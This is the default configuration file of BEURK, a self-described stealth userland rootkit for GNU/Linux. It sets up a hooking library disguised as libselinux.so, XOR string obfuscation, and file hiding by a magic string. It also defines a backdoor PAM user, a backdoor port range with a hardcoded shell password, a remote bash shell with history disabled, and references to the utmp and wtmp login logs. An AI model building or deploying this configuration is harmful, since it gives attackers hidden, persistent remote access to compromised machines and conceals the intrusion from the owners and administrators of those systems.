# BEURK is an userland rootkit for GNU/Linux, focused around stealth.
# -> Default Configuration File
#
# vi: ft=conf

# str: name of the generated evil hooking library
LIBRARY_NAME = libselinux.so

# str: compiler to use while building BEURK
CC = cc

# hexbyte: the XOR key to use for obfuscated strings
XOR_KEY = 0xfe

# int: set DEBUG_LEVEL to 1 or 2 (0 to disable)
DEBUG_LEVEL = 0

# str: set debug file destination
DEBUG_FILE = /dev/stderr

# bool: enable or disable Ptrace Hooking (see API Docs)
ENABLE_PTRACE = true

# bool: enable or disable libpam related features
ENABLE_PAM = true

# bool: enable or disable libpcap related features
ENABLE_PCAP = true

# bool: enable or disable openssl related features
ENABLE_SSL = true

# str: hide files with this string in the name
MAGIC_STRING = _BEURK_

# str: PAM username (for su / ssh login)
PAM_USER = beurkroot

# int: lowest port to connect to from backdoor
LOW_BACKDOOR_PORT = 64830
# int: highest port to connect to from backdoor
HIGH_BACKDOOR_PORT = 64840

# str: password to connect
SHELL_PASSWORD = b3urkR0cks

# str: welcome message on backdoor connection
SHELL_MOTD = Welcome to BEURK's hidden shell ...

# str: remote shell to use for backdoor connection
SHELL_TYPE = /bin/bash

# str: name of the environment variable used to identify our shell
HIDDEN_ENV_VAR = BEURK_ATTACKER

# str: predefined env `key=val` strings to set on shell dropping
_ENV_IS_ATTACKER =  BEURK_ATTACKER=true
_ENV_NO_HISTFILE =  HISTFILE=/dev/null
_ENV_XTERM =        TERM=xterm

# str: utmp file
_UTMP_FILE = /var/run/utmp
# str: wtmp file
_WTMP_FILE = /var/log/wtmp

# str: path to processes
PROC_PATH = /proc/

# str: format string for proc/env
ENV_LINE = %s/environ

# int: maximal length of our strings
MAX_LEN = 4125
